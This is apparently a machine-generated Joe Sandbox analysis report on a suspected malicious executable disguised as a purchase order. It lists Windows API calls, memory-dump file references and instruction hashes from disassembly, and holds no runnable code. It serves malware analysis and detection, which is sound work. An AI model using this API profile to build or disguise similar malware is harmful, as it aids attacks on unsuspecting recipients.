                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcscpy
                                                    • String ID: 3, 3, 8, 1
                                                    • API String ID: 3469035223-357260408
                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                    • API String ID: 2574300362-3530519716
                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                    • API String ID: 2574300362-275556492
                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                    • API String ID: 2574300362-58917771
                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                    APIs
                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                    • __itow.LIBCMT ref: 004699CD
                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                    • __itow.LIBCMT ref: 00469A97
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                    APIs
                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                    APIs
                                                    • GetParent.USER32(?), ref: 004503C8
                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Proc$Parent
                                                    • String ID:
                                                    • API String ID: 2351499541-0
                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                    APIs
                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                    • _wcslen.LIBCMT ref: 00449519
                                                    • _wcslen.LIBCMT ref: 00449526
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                    • String ID:
                                                    • API String ID: 2886238975-0
                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
